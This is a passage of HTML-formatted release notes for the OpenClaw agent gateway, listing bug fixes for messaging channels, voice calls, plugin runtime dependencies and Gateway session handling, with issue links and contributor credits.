<p>WhatsApp: stage <code>qrcode</code> through root mirrored runtime dependencies so packaged QR pairing can render from staged plugin-runtime-deps installs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362623764" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75394" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75394/hovercard" href="https://github.com/openclaw/openclaw/issues/75394">#75394</a>. Thanks @FelipeX2001.</p>
</li>
<li>
<p>Discord/voice: apply per-channel Discord <code>systemPrompt</code> overrides to voice transcript turns by forwarding the trusted channel prompt through the voice agent run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4077930512" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/47095" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/47095/hovercard" href="https://github.com/openclaw/openclaw/issues/47095">#47095</a>. Thanks @qearlyao.</p>
</li>
<li>
<p>Discord/native commands: send component-only interaction replies from slash command and status handlers instead of treating renderable Discord components as an empty response. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Slack/slash commands: send block-only slash command replies instead of dropping Slack block payloads with no plain-text fallback. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Telegram/messages: derive fallback text from interactive button/select labels before sending button-only payloads, so Telegram replies are not rejected as empty messages. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>LINE/messages: send quick-reply-only payloads with fallback option text instead of accepting the payload and returning an empty delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Auto-reply/docking: require <code>/dock-*</code> route switches to start from direct chats, so group or channel participants cannot reroute a shared session's future replies into a linked DM. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep text-DM main-session route updates pinned to the configured DM owner, matching component interactions so another direct-message sender cannot redirect future main-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Mattermost/Matrix: keep direct-message main-session route updates pinned to the configured DM owner so paired or temporarily allowed senders cannot redirect future shared-session replies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord: keep SecretRef-backed bot tokens discoverable for message actions without resolving the token during schema generation, and resolve scoped channel SecretRefs before outbound agent message sends even when the tool is built from a config snapshot. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362174273" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75324" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75324/hovercard" href="https://github.com/openclaw/openclaw/issues/75324">#75324</a>. Thanks @slideshow-dingo and @Conan-Scott.</p>
</li>
<li>
<p>Updates: run package post-install doctor repair with the managed Gateway service profile and state paths when a daemon is installed, so shell/profile mismatches no longer repair the caller state while the restarted Gateway keeps stale config. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Models/DeepInfra: declare DeepInfra manifest catalog discovery and derive its runtime fallback catalog from the manifest, restoring provider-filtered <code>models list --all --provider deepinfra</code> rows without duplicated static model data. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>CLI/update: verify managed gateway restarts against the installed service port instead of the caller shell port, so package updates do not report a healthy daemon as failed when profiles use different gateway ports. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/agent: reject strict <code>openclaw agent --deliver</code> requests with missing delivery targets before starting the agent run, so users do not wait for a completed turn that cannot send anywhere. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Setup/import: honor non-interactive <code>--import-from</code> onboarding flags by running the migration import path instead of silently completing normal setup without importing anything. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/voice: run voice-channel turns under a voice-output policy that hides the agent <code>tts</code> tool and asks for spoken reply text, so <code>/vc join</code> sessions synthesize and play agent replies instead of ending with <code>NO_REPLY</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208687812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61536" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61536/hovercard" href="https://github.com/openclaw/openclaw/issues/61536">#61536</a>. Thanks @aounakram.</p>
</li>
<li>
<p>Doctor/plugins: keep plain <code>doctor --non-interactive</code> from installing bundled plugin runtime dependencies, so headless health checks report missing deps while <code>doctor --fix</code> remains the explicit repair path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/gateway: require an interactive confirmation before installing or rewriting the Gateway service, so <code>doctor --fix --non-interactive</code> can repair plugin/config drift without replacing the operator's launchd/systemd service from a temporary environment. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: include packaged OpenClaw identity in bundled plugin loader cache keys, so same-path package upgrades stop reusing stale versioned runtime-deps mirrors. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357604708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75045" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75045/hovercard" href="https://github.com/openclaw/openclaw/issues/75045">#75045</a>. Thanks @sahilsatralkar.</p>
</li>
<li>
<p>Plugin SDK: restore reply-prefix and reply-pipeline helpers on the deprecated root/compat SDK surface so external plugins still using <code>openclaw/plugin-sdk</code> do not fail message dispatch after update. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359892122" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75171" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75171/hovercard" href="https://github.com/openclaw/openclaw/issues/75171">#75171</a>. Thanks @zhangxiliang.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune inactive same-package versioned runtime-deps roots after bundled dependency repair, so upgrades do not leave old <code>openclaw-&lt;version&gt;-&lt;hash&gt;</code> package caches behind after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: prune legacy version-scoped plugin runtime-deps roots during bundled dependency repair and cover the path in Package Acceptance's upgrade-survivor matrix, so upgrades from 2026.4.x no longer leave stale per-plugin runtime trees after doctor runs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/runtime-deps: keep Gateway startup plugin imports and runtime plugin fallback loads verify-only after startup/config repair planning, so packaged installs no longer spawn package-manager repair from hot paths after readiness. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361552521" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75283" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75283/hovercard" href="https://github.com/openclaw/openclaw/issues/75283">#75283</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357974990" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75069" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75069/hovercard" href="https://github.com/openclaw/openclaw/issues/75069">#75069</a>. Thanks @brokemac79 and @xiaohuaxi.</p>
</li>
<li>
<p>Plugins/runtime-deps: treat package.json runtime-deps manifests as supersets when generated materialization metadata is absent, so bundled plugin activation stops restaging already-installed dependency subsets on every activation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362879118" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75429" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75429/hovercard" href="https://github.com/openclaw/openclaw/issues/75429">#75429</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362889795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75431" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75431/hovercard" href="https://github.com/openclaw/openclaw/pull/75431">#75431</a>) Thanks @loyur.</p>
</li>
<li>
<p>iMessage: add stdin write callback and error listener to IMessageRpcClient so async EPIPE from a closed child process rejects the pending request instead of crashing the gateway with uncaughtException. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>MCP/stdio: settle MCP stdio transport send() from the write callback instead of resolving immediately on buffer acceptance, so async write errors reject the promise instead of being lost. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Process/exec: add stdin error listener in runCommandWithTimeout so EPIPE from a prematurely-exited child is swallowed instead of escaping to uncaughtException. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362994855" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75438" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75438/hovercard" href="https://github.com/openclaw/openclaw/issues/75438">#75438</a>.</p>
</li>
<li>
<p>Voice Call/realtime: add default-off fast memory/session context for <code>openclaw_agent_consult</code>, giving live calls a bounded answer-or-miss path before the full agent consult. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329662019" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71849" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71849/hovercard" href="https://github.com/openclaw/openclaw/issues/71849">#71849</a>. Thanks @amzzzzzzz.</p>
</li>
<li>
<p>Google Meet: interrupt Realtime provider output when local barge-in clears playback, so command-pair audio stops model speech instead of only restarting Chrome playback. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346767837" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73850" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73850/hovercard" href="https://github.com/openclaw/openclaw/issues/73850">#73850</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346567653" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73834" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73834/hovercard" href="https://github.com/openclaw/openclaw/pull/73834">#73834</a>) Thanks @shhtheonlyperson.</p>
</li>
<li>
<p>Gateway/config: cap oversized plugin-owned schemas in the full <code>config.schema</code> response so large installed plugin sets cannot balloon Gateway RSS or crash schema clients. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Plugins/update: skip ClawHub and marketplace plugin updates when the bundled version is newer than the recorded installed version, so <code>openclaw update</code> no longer overwrites working bundled plugins with older external packages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363046993" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75447" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75447/hovercard" href="https://github.com/openclaw/openclaw/issues/75447">#75447</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: use bounded tail reads for sessions-list transcript usage fallbacks and cap bulk title/last-message hydration, keeping large session stores responsive when rows request derived previews. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/sessions: yield during bulk transcript title/preview hydration and copy compaction checkpoints asynchronously, keeping the Gateway event loop responsive for large session stores and large transcripts. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362222686" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75330" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75330/hovercard" href="https://github.com/openclaw/openclaw/issues/75330">#75330</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362708402" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75414" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75414/hovercard" href="https://github.com/openclaw/openclaw/issues/75414">#75414</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Gateway/sessions: stream bounded transcript reads for session detail, history, artifacts, compaction, and send/subscribe sequence paths so small Gateway requests no longer materialize large transcripts or OOM on oversized session logs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/chat: bound chat-history transcript reads to the requested display window so large session logs no longer OOM the Gateway when clients ask for a small history page. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>BlueBubbles: detect audio attachments by Apple UTIs (<code>public.audio</code>, <code>public.mpeg-4-audio</code>, <code>com.apple.m4a-audio</code>, <code>com.apple.coreaudio-format</code>) in addition to <code>audio/*</code> MIME, so iMessage voice notes whose webhook payload only carries the UTI are now classified as audio in the inbound <code>&lt;media:audio&gt;</code> placeholder instead of falling through to the generic <code>&lt;media:attachment&gt;</code> tag. Thanks @omarshahine.</p>
</li>
<li>
<p>Voice Call/Twilio: honor stored pre-connect TwiML before realtime webhook shortcuts and reject DTMF sequences outside conversation mode, so Meet PIN entry cannot be skipped or silently dropped. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Docs/sandboxing: clarify that sandbox setup scripts (<code>sandbox-setup.sh</code>, <code>sandbox-common-setup.sh</code>, <code>sandbox-browser-setup.sh</code>) are only available from a source checkout, and add inline <code>docker build</code> commands for npm-installed users so sandbox image setup works without cloning the repo. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363242333" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75485" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75485/hovercard" href="https://github.com/openclaw/openclaw/issues/75485">#75485</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: play Twilio Meet DTMF before opening the realtime media stream and carry the intro as the initial Voice Call message, so the greeting is generated after Meet admits the phone participant instead of racing a live-call TwiML update. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Google Meet/Voice Call: make Twilio setup preflight honor explicit <code>--transport twilio</code> and fail local/private Voice Call webhook URLs, including IPv6 loopback and unique-local forms, before joins. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: retry transient 21220 live-call TwiML updates and catch answered-path initial-greeting failures, so a fast answered callback no longer crashes the Gateway or drops the Twilio greeting/listen transition. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353522708" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74606" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74606/hovercard" href="https://github.com/openclaw/openclaw/pull/74606">#74606</a>) Thanks @Sivan22.</p>
</li>
<li>
<p>CLI/startup: preserve <code>OPENCLAW_HIDE_BANNER</code> banner suppression for route-first startup callers that rely on the default process environment while keeping read-only status/channel paths from repairing bundled plugin runtime dependencies. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360048495" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75183" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75183/hovercard" href="https://github.com/openclaw/openclaw/pull/75183">#75183</a>.</p>
</li>
<li>
<p>Voice Call/Twilio: register accepted media streams immediately but wait for realtime transcription readiness before speaking the initial greeting, so reconnect grace handling stays live while OpenAI STT startup is no longer starved by TTS. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360162005" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75197" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75197/hovercard" href="https://github.com/openclaw/openclaw/issues/75197">#75197</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361111739" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75257" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75257/hovercard" href="https://github.com/openclaw/openclaw/pull/75257">#75257</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/donkeykong91/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/donkeykong91">@donkeykong91</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PfanP/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PfanP">@PfanP</a>.</p>
</li>
<li>
<p>Voice Call CLI: run gateway-delegated <code>voicecall continue</code> through operation-id polling and protocol-shaped errors, so long conversational turns keep their transcript result without blocking a single Gateway RPC. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363097375" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75459" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75459/hovercard" href="https://github.com/openclaw/openclaw/pull/75459">#75459</a>) Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Voice Call CLI: delegate operational <code>voicecall</code> commands to the running Gateway runtime and skip webhook startup during CLI-only plugin loading, preventing webhook port conflicts and <code>setup --json</code> hangs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4331824729" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72345" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72345/hovercard" href="https://github.com/openclaw/openclaw/issues/72345">#72345</a>. Thanks @serrurco and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Agents/pi-embedded-runner: extract the <code>abortable</code> provider-call wrapper from <code>runEmbeddedAttempt</code> to module scope so its promise handlers no longer close over the run lexical context, releasing transcripts, tool buffers, and subscription callbacks when a provider call hangs past abort. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4348625606" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74182/hovercard" href="https://github.com/openclaw/openclaw/issues/74182">#74182</a>) Thanks @cjboy007.</p>
</li>
<li>
<p>Docker: restore <code>python3</code> in the gateway runtime image after the slim-runtime switch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4357583202" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75041" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75041/hovercard" href="https://github.com/openclaw/openclaw/issues/75041">#75041</a>.</p>
</li>
<li>
<p>Agents/session-repair: fix resumed sessions failing with repeated 400 errors on Anthropic and strict OpenAI-compatible providers (Qwen, mlx-vlm) after an interrupted conversation or blank user input. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361379280" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75271" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75271/hovercard" href="https://github.com/openclaw/openclaw/issues/75271">#75271</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362043132" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75313" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75313/hovercard" href="https://github.com/openclaw/openclaw/issues/75313">#75313</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/amknight/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/amknight">@amknight</a>.</p>
</li>
<li>
<p>CLI/Voice Call: scope <code>voicecall</code> command activation to the Voice Call plugin so setup and smoke checks no longer broad-load unrelated plugin runtimes or hang after printing JSON. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Doctor/plugins: warn when restrictive <code>plugins.allow</code> is paired with wildcard or plugin-owned tool allowlists, making the exclusive plugin allowlist behavior visible before users hit empty callable-tool runs. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4174851981" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58009" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58009/hovercard" href="https://github.com/openclaw/openclaw/issues/58009">#58009</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245604493" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64982" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64982/hovercard" href="https://github.com/openclaw/openclaw/issues/64982">#64982</a>. Thanks @KR-Python and @BKF-Gitty.</p>
</li>
<li>
<p>Google Meet/Voice Call: keep Twilio Meet joins in conversation mode and reuse the realtime intro prompt when no voice-call-specific intro is configured, so answered phone bridge calls speak instead of joining silently. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4332551182" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72478" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72478/hovercard" href="https://github.com/openclaw/openclaw/issues/72478">#72478</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DougButdorf/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DougButdorf">@DougButdorf</a>.</p>
</li>
<li>
<p>Auto-reply/group chats: keep the <code>message</code> tool available for message-tool-only visible replies and apply group-scoped tool policy before deciding fallback delivery, so Discord/Slack-style rooms reply visibly in the correct channel after upgrades. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355291678" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74842" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74842/hovercard" href="https://github.com/openclaw/openclaw/issues/74842">#74842</a>; refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360452638" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75207" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75207/hovercard" href="https://github.com/openclaw/openclaw/issues/75207">#75207</a>. Thanks @davelutztx and @aa-on-ai.</p>
</li>
<li>
<p>Agents/commitments: keep inferred follow-ups internal when heartbeat target is none, strip raw source text from stored commitments, disable tools during due-commitment heartbeat turns, bound hidden extraction queue growth, expire stale commitments, and add QA/Docker safety coverage. Thanks @vignesh07.</p>
</li>
<li>
<p>Telegram/agents: keep typing indicators and optional generation tools off the reply critical path, so fresh Telegram replies no longer stall while provider catalogs and media models load. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362421293" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75360" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75360/hovercard" href="https://github.com/openclaw/openclaw/pull/75360">#75360</a>) Thanks @obviyus.</p>
</li>
<li>
<p>Agents/commitments: run hidden follow-up extraction on the configured agent/default model instead of falling back to direct OpenAI, so OpenAI Codex OAuth-only gateways no longer spam background API-key failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362274024" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75334" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75334/hovercard" href="https://github.com/openclaw/openclaw/issues/75334">#75334</a>. Thanks @sene1337.</p>
</li>
<li>
